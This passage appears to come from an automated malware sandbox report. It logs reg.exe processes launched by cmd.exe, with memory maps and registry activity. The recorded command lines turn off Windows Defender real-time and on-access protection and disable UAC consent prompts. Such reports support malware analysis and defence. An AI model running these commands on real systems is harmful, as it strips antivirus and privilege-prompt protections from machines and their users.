| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| reg.exe.mui | 0x000e0000 | 0x000e8fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0041ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000420000 | 0x00420000 | 0x005a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x00730fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x01b3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01b40000 | 0x01e0efff | Memory Mapped File | r |
|
|
|
- |
| kernelbase.dll.mui | 0x01e10000 | 0x01ecffff | Memory Mapped File | rw |
|
|
|
- |
| user32.dll | 0x77640000 | 0x77739fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77740000 | 0x7785efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77860000 | 0x77a08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| reg.exe | 0xfff70000 | 0xfffc5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd900000 | 0x7fefd96afff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdb80000 | 0x7fefdc48fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdd30000 | 0x7fefdd3dfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefdd40000 | 0x7fefdd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7fefdef0000 | 0x7fefdef7fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefed10000 | 0x7fefed76fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefed80000 | 0x7fefee88fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0f0000 | 0x7feff1cafff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feff1d0000 | 0x7feff2fcfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff4e0000 | 0x7feff550fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff850000 | 0x7feff86efff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feffa80000 | 0x7feffb1efff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7feffb20000 | 0x7feffb6cfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffb80000 | 0x7feffb80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 39 |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm | value_name = EnableLUA |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm | value_name = EnableLUA, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\reg.exe | base_address = 0xfff70000 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-19 14:11:55 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 114504 |
|
1 |
Process #17: reg.exe
9
0
| Information | Value |
|---|---|
| ID | #17 |
| File Name | c:\windows\system32\reg.exe |
| Command Line | reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:01:20, Reason: Child Process |
| Unmonitor | End Time: 00:01:22, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xacc |
| Parent PID | 0x9e4 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AD0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0005ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00066fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | rw |
|
|
|
- |
| reg.exe.mui | 0x00080000 | 0x00088fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00210000 | 0x00276fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00507fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x00690fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006a0000 | 0x006a0000 | 0x01a9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001aa0000 | 0x01aa0000 | 0x01aa0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ab0000 | 0x01ab0000 | 0x01ab0fff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01ac0000 | 0x01d8efff | Memory Mapped File | r |
|
|
|
- |
| user32.dll | 0x77640000 | 0x77739fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77740000 | 0x7785efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77860000 | 0x77a08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| reg.exe | 0xfff70000 | 0xfffc5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd900000 | 0x7fefd96afff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdb80000 | 0x7fefdc48fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdd30000 | 0x7fefdd3dfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefdd40000 | 0x7fefdd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7fefdef0000 | 0x7fefdef7fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefed10000 | 0x7fefed76fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefed80000 | 0x7fefee88fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0f0000 | 0x7feff1cafff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feff1d0000 | 0x7feff2fcfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff4e0000 | 0x7feff550fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff850000 | 0x7feff86efff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feffa80000 | 0x7feffb1efff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7feffb20000 | 0x7feffb6cfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffb80000 | 0x7feffb80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Write | STD_ERROR_HANDLE | size = 52 |
|
1 |
Registry (1)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\reg.exe | base_address = 0xfff70000 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-19 14:11:55 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 114551 |
|
1 |
Process #18: reg.exe
9
0
| Information | Value |
|---|---|
| ID | #18 |
| File Name | c:\windows\system32\reg.exe |
| Command Line | reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableOnAccessProtection /t REG_DWORD /d 00000001 /f |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:01:20, Reason: Child Process |
| Unmonitor | End Time: 00:01:22, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xad4 |
| Parent PID | 0xa0c (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AD8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| reg.exe.mui | 0x000e0000 | 0x000e8fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0011ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000400000 | 0x00400000 | 0x00587fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x00710fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x01b1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01b20000 | 0x01deefff | Memory Mapped File | r |
|
|
|
- |
| user32.dll | 0x77640000 | 0x77739fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77740000 | 0x7785efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77860000 | 0x77a08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| reg.exe | 0xfff70000 | 0xfffc5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd900000 | 0x7fefd96afff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdb80000 | 0x7fefdc48fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdd30000 | 0x7fefdd3dfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefdd40000 | 0x7fefdd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7fefdef0000 | 0x7fefdef7fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefed10000 | 0x7fefed76fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefed80000 | 0x7fefee88fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0f0000 | 0x7feff1cafff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feff1d0000 | 0x7feff2fcfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff4e0000 | 0x7feff550fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff850000 | 0x7feff86efff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feffa80000 | 0x7feffb1efff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7feffb20000 | 0x7feffb6cfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffb80000 | 0x7feffb80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Write | STD_ERROR_HANDLE | size = 52 |
|
1 |
Registry (1)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\reg.exe | base_address = 0xfff70000 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-19 14:11:56 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 115206 |
|
1 |
Process #19: reg.exe
13
0
| Information | Value |
|---|---|
| ID | #19 |
| File Name | c:\windows\system32\reg.exe |
| Command Line | reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:01:20, Reason: Child Process |
| Unmonitor | End Time: 00:01:22, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xadc |
| Parent PID | 0x9c4 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AE0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00156fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00161fff | Pagefile Backed Memory | rw |
|
|
|
- |
| reg.exe.mui | 0x00170000 | 0x00178fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00210000 | 0x00276fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00280fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x00567fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x006f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x01afffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01b00000 | 0x01dcefff | Memory Mapped File | r |
|
|
|
- |
| kernelbase.dll.mui | 0x01dd0000 | 0x01e8ffff | Memory Mapped File | rw |
|
|
|
- |
| user32.dll | 0x77640000 | 0x77739fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77740000 | 0x7785efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77860000 | 0x77a08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| reg.exe | 0xfff70000 | 0xfffc5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd900000 | 0x7fefd96afff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdb80000 | 0x7fefdc48fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdd30000 | 0x7fefdd3dfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefdd40000 | 0x7fefdd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7fefdef0000 | 0x7fefdef7fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefed10000 | 0x7fefed76fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefed80000 | 0x7fefee88fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0f0000 | 0x7feff1cafff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feff1d0000 | 0x7feff2fcfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff4e0000 | 0x7feff550fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff850000 | 0x7feff86efff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feffa80000 | 0x7feffb1efff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7feffb20000 | 0x7feffb6cfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffb80000 | 0x7feffb80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 39 |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | value_name = ConsentPromptBehaviorAdmin |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | value_name = ConsentPromptBehaviorAdmin, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\reg.exe | base_address = 0xfff70000 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-19 14:11:55 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 115144 |
|
1 |
